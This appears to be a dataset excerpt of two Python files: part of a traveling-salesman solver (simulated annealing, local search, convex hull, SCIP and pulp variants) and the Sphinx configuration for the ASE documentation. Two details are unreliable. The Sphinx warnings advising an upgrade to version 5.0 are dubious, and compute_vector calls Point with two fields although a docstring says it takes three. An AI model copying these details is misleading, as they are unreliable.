    output_data += ' '.join(map(str, solution))
    return output_data
# from openopt import *
#import networkx as nx
# Shared iteration budget for the local-search / simulated-annealing loops.
ITER_MAX = 2000
#
def write_scip(node_count, points):
    """Write *points* as a TSPLIB EUC_2D instance to the hard-coded SCIP
    example data path (node ids are the 0-based input positions)."""
    tsp = "/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/tspdata/pr76.tsp"
    header_lines = [
        "NAME : %s\n" % node_count,
        "COMMENT : RAS\n",
        "TYPE : TSP\n",
        "DIMENSION : %s\n" % node_count,
        "EDGE_WEIGHT_TYPE : EUC_2D\n",
        "NODE_COORD_SECTION\n",
    ]
    coord_lines = ["%s %s %s\n" % (index, point.x, point.y)
                   for index, point in enumerate(points)]
    with open(tsp, "w") as data:
        data.writelines(header_lines + coord_lines)
        data.write("\n")
    return
def scip(points, node_count):
    """Read back a tour computed by the external SCIP TSP example.

    Writes the instance file, then parses the pre-computed temp.tour file
    (the Popen invocations of SCIP itself are commented out, so this
    assumes the tour file already exists).  The first three lines of the
    tour file are skipped; each remaining line's first token is a node id.
    """
    write_scip(node_count, points)
    # process = Popen(['/opt/scipoptsuite/scip-3.0.1/examples/Coloring/bin/coloring', '-f', 'coloring.col'])
    # process = Popen(['/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/runme.sh'])
    #process = Popen(['/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/bin/sciptsp', '-c', 'read ' + tsp, '-c', 'set limits time 120','-c', 'optimize', '-c','write problem coloring.tsp','-c','quit'])
    # (stdout, stderr) = process.communicate()
    # process.wait()
    csol_solution = open("/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/temp.tour", "r")
    #csol_solution.readline()
    #csol_solution.readline()
    sol = []
    for i, line in enumerate(csol_solution):
        if i > 2:
            print(line)
            if len(line) > 0:
                sol.append(int(line.split()[0]))
    csol_solution.close()
    return sol
# def oo_solution(points, node_count):
# G = nx.Graph()
# G.add_edges_from(\
# [(i,j,{'time': length(pi,pj), 'cost':length(pi,pj)}) for (i,pi) in enumerate(points) for (j,pj) in enumerate(points) if i != j ])
# p = TSP(G, objective = 'time', start = 0,maxFunEvals=1500000,maxIter=50000) #, [optional] returnToStart={True}|False, constraints = ..., etc
# r = [] # p.solve('sa') # also you can use some other solvers - sa, interalg, OpenOpt MILP solvers
# return ([r.nodes[i] for i in range(0,node_count)])
def solve_it2(input_data):
    """Parse a TSP instance and solve it via the external SCIP tool.

    BUGFIX: Point is a 3-field namedtuple (id, x, y); the original call
    omitted the id and raised TypeError on every input line.  The id is
    now the 0-based position, matching how solve_it builds points.
    """
    # parse the input
    lines = input_data.split('\n')
    node_count = int(lines[0])
    points = []
    for i in range(1, node_count+1):
        line = lines[i]
        parts = line.split()
        points.append(Point(i - 1, float(parts[0]), float(parts[1])))
    solution = scip(points, node_count)
    print(solution)
    # objective: total length of the closed tour
    obj = length(points[solution[-1]], points[solution[0]])
    for index in range(0, node_count - 1):
        obj += length(points[solution[index]], points[solution[index + 1]])
    # prepare the solution in the specified output format
    output_data = str(obj) + ' ' + str(0) + '\n'
    output_data += ' '.join(map(str, solution))
    return output_data
# def s_metropolis(t,N,s):
# n = random.randint(0,N-1)
# if f(n) <= f(s):
# return n
# else:
# if random.random()< exp(-(f(n)-f(s))/t):
# return n
# else:
# return s
def update_temp(is_increase, t):
    """Next simulated-annealing temperature.

    Warming multiplies by (1 + epsilon); cooling multiplies by 0.99 but
    never drops below init_temp()/1000.
    """
    epsilon = 0.01
    if is_increase:
        return t * (1 + epsilon)
    return max(t * 0.99, init_temp() / 1000)
def init_sol():
    """Read a precomputed starting tour from ./5.txt.

    The file holds comma-separated node indices; returns them as a list of
    ints.  The context manager closes the file even if parsing fails.
    """
    with open("./5.txt", 'r') as handle:
        raw = handle.read()
    return [int(token) for token in raw.split(",")]
def sa_solution(points,node_count):
    """Simulated annealing for the TSP, seeded from a tour stored on disk.

    Keeps three tours: ``s`` (current candidate), ``s_min`` (the tour new
    moves are generated from) and ``s_real_min`` (best tour ever seen,
    which is returned after two local-search polishing passes).
    ``taboo_s`` records objective values already accepted so the same
    value is not re-accepted later.
    """
    taboo_s = set([])
    max_search = ITER_MAX * 5
    #s = naive_solution(points,node_count)
    s = init_sol()
    min_val = tour_length(node_count, points, s)
    t = init_temp()
    s_min = s
    s_real_min = s
    real_min = min_val
    taboo_s.add(min_val)
    # Convex-hull vertex indices guide the neighbourhood moves in try_swap2.
    cx_hull = cx_indices(points,node_count)
    for k in range(1,max_search):
        current_value, s = try_swap2(s_min, node_count, points,cx_hull)
        if current_value not in taboo_s:
            if current_value <= min_val:
                # Improving (or equal) move: always accept and cool down.
                s_min = s
                min_val = current_value
                if current_value <= real_min:
                    # New global best so far.
                    s_real_min = s
                    real_min = current_value
                    #print("Min " +str(current_value) )
                #taboo_s.add(min_val)
                #print(min_val)
                t = update_temp(False,t)
            else:
                # Worsening move: accept with the Metropolis probability.
                if random.random() < math.exp(-(current_value-min_val)/t):
                    #print("Update cur " + str(current_value) + " min " + str(min_val) + "prob" + str(math.exp(-(current_value-min_val)/t)))
                    s_min = s
                    min_val = current_value
                    #taboo_s.add(min_val)
                    #print(min_val)
                    t = update_temp(False,t)
                else:
                    #print("No update cur " + str(current_value) + " min " + str(min_val) + "prob" + str(math.exp(-(current_value-min_val)/t)))
                    # Rejected: heat up slightly so the walk can escape.
                    t = update_temp(True,t)
        if k%(max_search/10)==0:
            # Progress report, ten times over the whole run.
            print ( str(real_min) + " " + str(current_value))
    # Polish the best tour with the two local-search variants.
    s_real_min = ls_solution_given_init(node_count, points,s_real_min)
    s_real_min = ls_solution_given_init2(node_count, points,s_real_min)
    return s_real_min
def init_temp():
    """Initial simulated-annealing temperature."""
    start_temperature = 3
    return start_temperature
def trivial_solution(points, node_count):
    """Baseline tour: visit nodes 0..node_count-1 in input-file order.

    The point coordinates are irrelevant for this baseline.
    """
    return range(node_count)
def ls_solution_given_init(node_count, points, solution):
    """Hill-climbing local search using only try_swap2 moves.

    Runs ITER_MAX iterations, keeping a proposed tour whenever it is
    strictly shorter than the current one, and returns the final tour.
    """
    current_value = tour_length(node_count, points, solution)
    # Hull vertices act as fixed waypoints for the segment-move neighbourhood.
    cx_hull = cx_indices(points,node_count)
    iter_max = ITER_MAX
    for i in range(0, iter_max):
        new_value, solution2 = try_swap2(solution, node_count, points,cx_hull)
        if new_value < current_value:
            # print new_value
            # Strict improvement: adopt the proposed tour.
            current_value, solution = new_value, solution2
        if i % (iter_max / 10) == 0:
            # Progress report, ten times over the run.
            print (current_value)
    # print solution
    # Debug: positions of consecutive hull vertices in the final tour.
    for i in range(0,len(cx_hull)-2):
        print (str(solution.index(cx_hull[i])) + " " + str(solution.index(cx_hull[i+1])))
    return solution
def ls_solution_given_init2(node_count, points, solution):
    """Hill-climbing local search mixing try_swap2 and try_swap moves.

    Same accept-if-strictly-better rule as ls_solution_given_init, but runs
    ITER_MAX * 200 iterations and picks one of the two neighbourhood
    generators with a coin flip at every step.
    """
    current_value = tour_length(node_count, points, solution)
    cx_hull = cx_indices(points,node_count)
    iter_max = ITER_MAX * 200
    for i in range(0, iter_max):
        # Coin flip between the segment-move and range-swap neighbourhoods.
        if random.randint(0,1)==0:
            new_value, solution2 = try_swap2(solution,node_count, points,[])
        else:
            new_value, solution2 = try_swap(solution,node_count, points)
        if new_value < current_value:
            current_value, solution = new_value, solution2
        if i % (iter_max / 10) == 0:
            # Parenthesized print: consistent with the rest of the file and
            # valid for a single value under both Python 2 and Python 3
            # (the original bare `print current_value` was Python-2-only).
            print (current_value)
    # Debug: positions of consecutive hull vertices in the final tour.
    for i in range(0,len(cx_hull)-2):
        print (str(solution.index(cx_hull[i])) + " " + str(solution.index(cx_hull[i+1])))
    return solution
def ls_solution(points, node_count):
    """Local search started from the convex-hull-based constructive tour."""
    initial_tour = naive_solution(points, node_count)
    return ls_solution_given_init(node_count, points, initial_tour)
def cx_indices(points, node_count):
    """Indices (into ``points``) of the convex-hull vertices, in hull order.

    When a coordinate appears more than once in ``points``, the last index
    for that coordinate wins, matching the original dict-comprehension.
    """
    index_of = {}
    for idx, pt in enumerate(points):
        index_of[pt] = idx
    return [index_of[pt] for pt in convex_hull(points)]
def convex_hull(points):
    """Convex hull of 2D points via Andrew's monotone chain, O(n log n).

    ``points`` is any iterable of (x, y) pairs.  Returns the hull vertices
    in counter-clockwise order, starting from the lexicographically
    smallest point.  Collinear points on the boundary are dropped.
    """
    pts = sorted(set(points))
    if len(pts) <= 1:
        # Zero or one distinct point: the hull is the input itself.
        return pts

    def turns_right(o, a, b):
        # z-component of cross(OA, OB); <= 0 means clockwise or collinear.
        return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0]) <= 0

    def half_hull(ordered):
        chain = []
        for p in ordered:
            while len(chain) >= 2 and turns_right(chain[-2], chain[-1], p):
                chain.pop()
            chain.append(p)
        # Drop the last vertex: it reappears at the start of the other chain.
        return chain[:-1]

    # Lower hull over ascending x, upper hull over descending x.
    return half_hull(pts) + half_hull(reversed(pts))
# Sanity check: the hull of a 10-by-10 integer grid is its four corners.
# Floor division (//) keeps this an integer grid on Python 3 as well; the
# original i/10 only produced a grid under Python 2 integer division.
assert convex_hull([(i//10, i%10) for i in range(100)]) == [(0, 0), (9, 0), (9, 9), (0, 9)]
def get_rightmost(points):
    """Index of the point with the largest x coordinate.

    Ties on x are broken in favour of the largest index (tuple comparison).
    """
    best_x, best_idx = max((pt.x, pos) for (pos, pt) in enumerate(points))
    return best_idx
def rank_simple(vector):
    """Indices of ``vector`` ordered so the referenced values ascend.

    The sort is stable: equal values keep their original relative order.
    """
    order = list(range(len(vector)))
    order.sort(key=lambda pos: vector[pos])
    return order
def sort_closest_point(p_base, points):
    """Indices of ``points`` sorted by increasing distance from ``p_base``.

    Delegates the index ordering to rank_simple over the distance list.
    (The dead local ``l_min`` from the original was removed.)
    """
    distances = [length(p_base, p) for p in points]
    return rank_simple(distances)
def sort_by_x(points):
    """Indices of ``points`` ordered by ascending x coordinate (stable)."""
    decorated = sorted(enumerate(points), key=lambda pair: pair[1].x)
    return [idx for idx, _pt in decorated]
def compute_vector(p_in, p_out):
    """Displacement vector from ``p_in`` to ``p_out`` as a Point."""
    dx = p_out.x - p_in.x
    dy = p_out.y - p_in.y
    return Point(dx, dy)
def is_on_the_way(p_in, p_out, p_c, eps):
    """True when ``p_c`` lies in the forward half-plane of p_in -> p_out.

    Computed as dot(p_in->p_out, p_in->p_c) + eps >= 0, where ``eps``
    loosens the test to tolerate near-perpendicular points.
    """
    direction = compute_vector(p_in, p_out)
    toward_c = compute_vector(p_in, p_c)
    dot = direction.x * toward_c.x + direction.y * toward_c.y
    return dot + eps >= 0
def naive_solution(points, node_count):
    """Constructive tour: convex-hull vertices first, then the remaining
    nodes in order of increasing x coordinate.

    Membership of already-placed nodes is tracked with a set, replacing the
    original per-node O(n) list scan (O(n^2) overall) with O(1) lookups;
    the resulting tour is identical.  The large block of dead commented-out
    interleaving code was removed.
    """
    cx_hull = cx_indices(points, node_count)
    print(cx_hull)
    solution = list(cx_hull)
    placed = set(cx_hull)
    for node in sort_by_x(points):
        if node not in placed:
            solution.append(node)
            placed.add(node)
    return solution
def swap_2_ranges(c1, c2, c3, node_count, solution,before):
    """Relocate the segment solution[c1+1..c2] next to position c3.

    With ``before`` True the segment is re-inserted right after index c3
    (the block solution[c3+1..c1] slides after it); otherwise the block
    solution[c2+1..c3] is placed before the segment.  The moved segment is
    copied either in order or reversed, chosen by a coin flip.  Returns a
    new tour list; ``solution`` itself is not modified.

    NOTE(review): the index arithmetic assumes 0 <= c3 <= c1 < c2 <
    node_count when ``before`` is True, and c1 < c2 < c3 < node_count
    otherwise — confirm at call sites (try_swap2 appears to guarantee it).
    """
    inverse = random.randint(0,1)
    if before:
        # Untouched prefix up to and including c3.
        solution2 = [solution[i] for i in range(0, c3+1)]
        if inverse == 0:
            for i in range(c1+1, c2+1):
                solution2.append(solution[i])
        else:
            # Reversed copy of the moved segment.
            for i in range(c1+1, c2+1):
                solution2.append(solution[c2 + 1 + c1 - i])
        # Block that used to precede the segment, then the untouched tail.
        for i in range(c3+1, c1+1):
            solution2.append(solution[i])
        for i in range(c2+1, node_count):
            solution2.append(solution[i])
    else:
        # Untouched prefix up to and including c1.
        solution2 = [solution[i] for i in range(0, c1+1)]
        # Block that used to follow the segment moves in front of it.
        for i in range(c2+1, c3+1):
            solution2.append(solution[i])
        if inverse == 0:
            for i in range(c1+1, c2+1):
                solution2.append(solution[i])
        else:
            # Reversed copy of the moved segment.
            for i in range(c1+1, c2+1):
                solution2.append(solution[c2 + 1 + c1 - i])
        for i in range(c3+1, node_count):
            solution2.append(solution[i])
    return solution2
def swap_range(c1, c2, node_count, solution):
    """Rebuild the tour with the middle segment solution[c1+1..c2-1]
    moved to the end, copied forward or reversed (coin flip).

    Returns a new list; ``solution`` itself is not modified.
    """
    rebuilt = [solution[pos] for pos in range(0, c1 + 1)]
    for pos in range(c2, node_count):
        rebuilt.append(solution[pos])
    if random.randint(0, 1) == 0:
        # Append the displaced middle segment in its original order.
        for pos in range(c1 + 1, c2):
            rebuilt.append(solution[pos])
    else:
        # Append it reversed: index c2+c1-pos walks the segment backwards.
        for pos in range(c1 + 1, c2):
            rebuilt.append(solution[c2 + c1 - pos])
    return rebuilt
def try_swap2(solution,node_count, points,cx_hull):
    """Propose one neighbour of ``solution`` and return (length, tour).

    When ``cx_hull`` is non-empty, a random pair of consecutive hull
    vertices bounds the window [start, end] the move may touch, preserving
    the hull order of the tour; otherwise the whole tour is eligible.
    With probability 0.8 a segment relocation (swap_2_ranges) is tried,
    otherwise a plain segment reversal (swap).  When no valid cut points
    exist, ``solution`` is returned unchanged.
    """
    a = random.random()
    if cx_hull:
        # Restrict the move to the stretch between two consecutive hull nodes.
        cx_point = random.randint(0,len(cx_hull)-1)
        start = solution.index(cx_hull[cx_point])
        if cx_point == len(cx_hull)-1:
            # Last hull vertex: the window runs to the end of the tour.
            end = node_count - 1
        else:
            end = solution.index(cx_hull[cx_point+1]) + 1
            if end > node_count - 1:
                end = node_count - 1
    else:
        # No hull restriction: any position may be cut.
        start = -1
        end = node_count - 1
    if a < 0.8:
        if end - 2 >= start:
            if end - 2 == start:
                # Window of exactly three positions: both cuts are forced.
                c1 = start + 1
                c2 = c1 + 1
            else:
                c1 = random.randint(start + 1, end-2)
                c2 = random.randint(c1+1,end-1)
            before = random.random()
            if before<0.5:
                # Re-insert the segment somewhere before c1.
                c3 = random.randint(0,c1)
                solution2 = swap_2_ranges(c1, c2, c3,node_count, solution,True)
            else:
                if c2 < node_count-2:
                    # Re-insert the segment somewhere after c2.
                    c3 = random.randint(c2+1,node_count-1)
                    solution2 = swap_2_ranges(c1, c2, c3,node_count, solution,False)
                else:
                    # No room after c2: keep the tour unchanged.
                    solution2 = solution
        else:
            # Window too small for a relocation move.
            solution2 = solution
    else:
        if end-2>start:
            c1 = random.randint(start,end-2)
            c2 = random.randint(c1+1,end-1)
            solution2 = swap(solution,c1,c2)
        else:
            solution2 = solution
    new_value = tour_length(node_count, points, solution2)
    return new_value, solution2
def try_swap(solution, node_count, points):
    """Propose one neighbour of ``solution`` and return (length, tour).

    Picks two random cut points and, on a coin flip, either moves the
    enclosed segment to the end of the tour (swap_range) or reverses it in
    place (swap).  The random-call sequence matches the original exactly:
    one random() followed by two randint() draws on either path, so the
    shared cut-point draws are hoisted above the branch.
    """
    move_choice = random.random()
    c1 = random.randint(0, node_count - 2)
    c2 = random.randint(c1 + 1, node_count - 1)
    if move_choice < 0.5:
        candidate = swap_range(c1, c2, node_count, solution)
    else:
        candidate = swap(solution, c1, c2)
    return tour_length(node_count, points, candidate), candidate
def swap(solution, c1, c2):
    """Return a copy of ``solution`` with the slice [c1..c2] reversed.

    This is the classic 2-opt reversal; ``solution`` is not modified.
    """
    return solution[:c1] + solution[c1:c2 + 1][::-1] + solution[c2 + 1:]
def build_variable(node_in, node_out):
    """Binary pulp variable for the edge (node_in, node_out).

    Only one orientation per unordered pair gets a variable (node_in >
    node_out); every other matrix entry is the inert constant 0.0.
    """
    if node_in <= node_out:
        return 0.0
    var_name = "x_in" + str(node_in) + "_out" + str(node_out)
    return pulp.LpVariable(var_name, 0, 1, 'Binary')
def find_out_node(node_in, out_edges, node_set, visited):
    """Find an unvisited, selected edge incident to ``node_in``.

    Scans candidates in ``node_set`` order.  Returns (node_out, 1) when the
    selected edge is stored as out_edges[node_in][node_out], (node_out, 2)
    when it is stored in the opposite orientation, and (None, 0) when no
    usable edge remains.  An edge counts as selected when its LP value
    exceeds 0.7; 0.0 matrix entries mean "no variable for this pair".
    """
    for node_out in node_set:
        forward = out_edges[node_in][node_out]
        if forward != 0.0 and not visited[node_in][node_out] and forward.value() > 0.7:
            return node_out, 1
        backward = out_edges[node_out][node_in]
        if backward != 0.0 and not visited[node_out][node_in] and backward.value() > 0.7:
            return node_out, 2
    return None, 0
def pulp_solution(points,node_count):
    """Solve a relaxed TSP with pulp and walk the selected edges into a tour.

    Builds one binary variable per unordered node pair (see build_variable),
    minimises total edge length subject to every node having degree 2, then
    follows the chosen edges starting from node 0 using find_out_node.

    NOTE(review): no subtour-elimination constraints are added, so the
    degree-2 solution may decompose into several cycles and the returned
    walk may cover only the cycle containing node 0 — confirm with callers.
    """
    tsp = pulp.LpProblem("Tsp Model", pulp.LpMinimize)
    node_set = range(0,node_count)
    out_edges = [[build_variable(node_in,node_out) for node_in in node_set] for node_out in node_set]
    # Objective: sum of length * edge indicator over every ordered pair
    # (the 0.0 entries for the unused orientation contribute nothing).
    tsp+= sum([sum([out_edges[node_in][node_out]*length(points[node_in], points[node_out]) for node_in in node_set ]) for node_out in node_set])
    for node in node_set:
        # Degree constraint: each node is incident to exactly two chosen edges.
        tsp += sum(out_edges[node][v] for v in node_set) + sum(out_edges[v][node] for v in node_set) == 2
    tsp.solve()
    # Debug dump of the edges the solver switched on.
    for t in tsp.variables():
        if t.value()>0.5:
            print (str(t) + " " + str(t.value()))
    # Walk the selected edges from node 0, marking each traversed edge.
    out = [0]
    visited = [[False for node_in in node_set] for node_out in node_set]
    node_in = 0
    while node_in is not None:
        node_out,a = find_out_node(node_in,out_edges,node_set,visited)
        if node_out is not None:
            out.append(node_out)
            if a == 1:
                visited[node_in][node_out] = True
            else:
                visited[node_out][node_in] = True
        node_in = node_out
    print(out)
    print(sorted(out))
    return out
import sys

if __name__ == '__main__':
    if len(sys.argv) > 1:
        file_location = sys.argv[1].strip()
        # Context managers guarantee both files are closed even on error
        # (the originals leaked handles if solve_it or a write raised).
        with open(file_location, 'r') as input_data_file:
            input_data = input_data_file.read()
        solution = solve_it(input_data)
        with open("solution", 'w') as f:
            f.write(solution)
    else:
        # Parenthesized print: valid for a single string under both
        # Python 2 and 3 (the original bare print was Python-2-only).
        print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/tsp_51_1)')
| 3like3beer/optimization | tsp/solver.py | Python | gpl-2.0 | 30,625 | [
"VisIt"
] | f9dba70b130b07e05287c2e09b0251a6beac6227469968d48cd2b8f83f858961 |
# -*- coding: utf-8 -*-
#
# ASE documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 20 09:39:26 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os

# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# Make the local Sphinx extension modules (ext.py, images.py, mathpng.py)
# importable from the documentation root directory.
sys.path.append('.')
# General configuration
# ---------------------

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# Prefer the bundled sphinx.ext.pngmath; fall back to the local mathpng
# extension for Sphinx versions that predate it.
try:
    from sphinx.ext import pngmath
    ext_png_math = 'sphinx.ext.pngmath'
except ImportError:
    ext_png_math = 'mathpng'
    # Parenthesized print keeps this config importable under Python 3 as
    # well (the original bare print statement was Python-2-only syntax).
    print('Warning: sphinx uses custom mathpng.py: please update to sphinx >= 5.0')
extensions = ['ext', 'images',
              'sphinx.ext.autodoc',
              ext_png_math]
# sphinx.ext.intersphinx only exists in newer Sphinx releases; skip the
# cross-project linking feature when it is unavailable.
try:
    from sphinx.ext import intersphinx
    extensions.append('sphinx.ext.intersphinx')
except ImportError:
    # Parenthesized print keeps this config importable under Python 3 as
    # well (the original bare print statement was Python-2-only syntax).
    print('Warning: no sphinx.ext.intersphinx available: please update to sphinx >= 5.0')
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'ASE'
copyright = '2008, CAMd'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
# Fall back to a hard-coded version string when the ase package itself is
# not importable (e.g. building the docs without ase installed).
try:
    from ase.version import version
except ImportError:
    version = '3.0.0'
# The full version, including alpha/beta/rc tags.
release = version
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'ase.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
# NOTE(review): this reuses the .ico favicon file; a larger raster image is
# more usual for html_logo — confirm this is intentional.
html_logo = '_static/ase.ico'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/ase.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = '.html'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ASEdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
latex_paper_size = 'a4'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
    ('contents', 'ase-manual.tex', 'ASE Manual', 'CAMd', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.  Raw string: '\u...' inside a
# non-raw literal is a SyntaxError on Python 3 (and a backslash-escape
# hazard in general); the resulting value is unchanged.
latex_preamble = r'\usepackage{amsmath}'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to gpaw.
intersphinx_mapping = {'http://wiki.fysik.dtu.dk/gpaw': None}
# sphinx.ext.pngmath manual configuration
# ---------------------------------------
# LaTeX preamble used when rendering math to PNG.  Raw strings for the same
# reason as latex_preamble: '\u...' in a non-raw literal is a SyntaxError
# on Python 3; the concatenated value is identical to the original.
pngmath_latex_preamble = (r'\usepackage{amsmath}'
                          r'\usepackage{amsfonts}'
                          r'\usepackage[active]{preview}')
# Additional arguments to give to dvipng, as a list.
# The default value is ['-gamma 1.5', '-D 110']
pngmath_dvipng_args = [
    '-bgTransparent',
    '-Ttight',
    '--noghostscript',
    '-l10',
    '--depth',
    '-D 136',
]
# correctly aligns the baselines
pngmath_use_preview = True
| slabanja/ase | doc/conf.py | Python | gpl-2.0 | 6,854 | [
"ASE",
"GPAW"
] | d595a021ba340766830bb9c38f09595d70dea9f77af397c52f7c342a6d986534 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.